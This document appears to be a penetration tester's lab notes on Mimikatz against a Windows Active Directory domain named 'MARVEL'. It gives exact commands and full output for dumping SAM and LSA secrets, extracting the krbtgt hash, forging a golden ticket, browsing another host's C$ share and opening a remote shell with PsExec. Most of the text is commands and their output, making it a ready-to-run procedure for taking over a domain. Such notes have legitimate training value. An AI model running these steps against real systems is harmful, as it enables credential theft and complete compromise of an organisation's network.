Mimikatz

• Once we get Domain Admin we can use mimikatz to dump the creds

• Launch mimikatz from the target and run privilege::debug (will allow us to debug processes):

  C:\Users\Administrator\Downloads>mimikatz.exe
  
    .#####.   mimikatz 2.2.0 (x86) #19041 Aug 10 2021 17:20:39
   .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
   ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
   ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
   '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
    '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
  
  mimikatz # privilege::debug
  Privilege '20' OK
  
  mimikatz #

• Can be useful on a compromised regular computer sekurlsa::logonpasswords we get NTLM (v1) hash and could try to use pass-the-hash.

  • With wdigest we can see passwords in cleartext (prior to win 7) after only deactivate so possible to reactivate it with mimikats and wait for somebody to log on.

  • Dump the sam lsadump::sam or lsadump::sam /patch

  • Dump lsa (Local Security Authority) lsadump::lsa /patch we get ntlm hashes and try to crack them.

Mimikatz - Golden Ticket Attack

• With a Golden ticket we can get access to any resource and system on the domain = complete access to the entire domain

• lsadump::lsa /inject /name:krbtgt

  mimikatz # lsadump::lsa /inject /name:krbtgt
  Domain : MARVEL / S-1-5-21-1324315119-2624990979-1304259423
  
  RID  : 000001f6 (502)
  User : krbtgt
  
   * Primary
      NTLM : 0afd880b6c9c7207067f0e15dab634a9
      LM   :
    Hash NTLM: 0afd880b6c9c7207067f0e15dab634a9
      ntlm- 0: 0afd880b6c9c7207067f0e15dab634a9
      lm  - 0: 662f5b48c70e0c5211f72eabdcffcfa6
  
   * WDigest
    [STRIPPED]
  
   * Kerberos
      Default Salt : MARVEL.LOCALkrbtgt
      Credentials
        des_cbc_md5       : 074fc873e6c40157
  
   * Kerberos-Newer-Keys
      Default Salt : MARVEL.LOCALkrbtgt
      Default Iterations : 4096
      Credentials
        aes256_hmac       (4096) : e5755cc451bc84fbe6004005f363e0425838d134306ffb0cb3a2f323e02a8ac9
        aes128_hmac       (4096) : a14075bef6022520025c4054880073a2
        des_cbc_md5       (4096) : 074fc873e6c40157
  
   * NTLM-Strong-NTOWF
      Random Value : 97decc0bc95a167ce7ebc2dd728fb83a

• Take note of:

  • Domain SID: S-1-5-21-1324315119-2624990979-1304259423

  • NTLM Hash of krbtgt: 0afd880b6c9c7207067f0e15dab634a9

• Pass the ticket: kerberos::golden /User:AnyDoesNotNeedToExist /domain:marvel.local /sid:S-1-5-21-1324315119-2624990979-1304259423 /krbtgt:0afd880b6c9c7207067f0e15dab634a9 /id:500 /ptt

 mimikatz # kerberos::golden /User:AnyDoesNotNeedToExist /domain:marvel.local /sid:S-1-5-21-1324315119-2624990979-1304259423 /krbtgt:0afd880b6c9c7207067f0e15dab634a9 /id:500 /ptt
User      : AnyDoesNotNeedToExist
Domain    : marvel.local (MARVEL)
SID       : S-1-5-21-1324315119-2624990979-1304259423
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 0afd880b6c9c7207067f0e15dab634a9 - rc4_hmac_nt
Lifetime  : 2/12/2022 10:32:39 AM ; 2/10/2032 10:32:39 AM ; 2/10/2032 10:32:39 AM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'AnyDoesNotNeedToExist @ marvel.local' successfully submitted for current session

• Get a cmd prmpt using the session and golden ticket misc::cmd

• We can access to anything on the network:

  C:\Users\Administrator\Downloads>dir \\THEDEFENDER\c$
   Volume in drive \\THEDEFENDER\c$ has no label.
   Volume Serial Number is 22E3-F05A
  
   Directory of \\THEDEFENDER\c$
  
  12/07/2019  01:14 AM    <DIR>          PerfLogs
  01/28/2022  02:29 PM    <DIR>          Program Files
  10/06/2021  05:58 AM    <DIR>          Program Files (x86)
  01/28/2022  04:33 PM    <DIR>          Share
  02/12/2022  05:34 AM    <DIR>          Users
  02/04/2022  01:19 PM    <DIR>          Windows
                 0 File(s)              0 bytes
                 6 Dir(s)  42,889,506,816 bytes free
  
  C:\Users\Administrator\Downloads>

• We can then use psexec to get a shell on a machine from the network

  • We download psexec on our compromised machine

  • We get the shell

    C:\Users\Administrator\Downloads\PSTools>PsExec.exe \\THEDEFENDER cmd.exe
    
    PsExec v2.34 - Execute processes remotely
    Copyright (C) 2001-2021 Mark Russinovich
    Sysinternals - www.sysinternals.com
    
    
    Microsoft Windows [Version 10.0.19044.1288]
    (c) Microsoft Corporation. All rights reserved.
    
    C:\Windows\system32>hostname
    THEDEFENDER

Mimikatz - Resources

GitHub - gentilkiwi/mimikatz: A little tool to play with Windows securityGitHub

Mimikatz

HomeGitHub

Mimikatz - Wiki